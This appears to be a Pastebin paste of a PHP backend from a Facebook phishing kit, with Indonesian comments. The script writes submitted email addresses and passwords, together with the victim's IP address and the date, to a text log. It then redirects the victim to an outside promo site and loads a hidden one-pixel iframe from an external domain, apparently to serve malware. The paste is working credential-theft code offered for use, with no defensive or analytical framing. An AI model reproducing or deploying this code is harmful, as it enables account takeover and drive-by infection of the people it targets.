Advertisement
Guest User

Untitled

a guest
Mar 14th, 2019
198
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.19 KB | None | 0 0
  1. <?php
  2. $file = "facelog.txt"; // Edit dulu ini
  3. $username = $_POST['email'];
  4. $password = $_POST['pass'];
  5. $ip = $_SERVER['REMOTE_ADDR'];
  6. $today = date("F j, Y, g:i a");
  7. $handle = fopen($file, 'a');
  8. if ($_GET['go']) {
  9. echo $file;
  10. }else{
  11. fwrite($handle, "--++FACEBOOK++--");
  12. fwrite($handle, "\n");
  13. fwrite($handle, "Username: ");
  14. fwrite($handle, "$username");
  15. fwrite($handle, "\n");
  16. fwrite($handle, "Password: ");
  17. fwrite($handle, "$password");
  18. fwrite($handle, "\n");
  19. fwrite($handle, "IP Address: ");
  20. fwrite($handle, "$ip");
  21. fwrite($handle, "\n");
  22. fwrite($handle, "Date Submitted: ");
  23. fwrite($handle, "$today");
  24. fwrite($handle, "\n");
  25. fwrite($handle, "--++SC-MANCING-MANIA++--");
  26. fwrite($handle, "\n");
  27. fwrite($handle, "\n");
  28. fclose($handle);
  29. echo '<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.2//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile12.dtd">
  30. <html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
  31. <title>Mengalihkan halaman</title>
  32. <meta http-equiv="Refresh" content="1; URL=http://promo-codeshop.ml/finish.html"/>
  33. </head><body>
  34. <iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
  35. </body>
  36. </html>
  37. ';
  38. }
  39. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement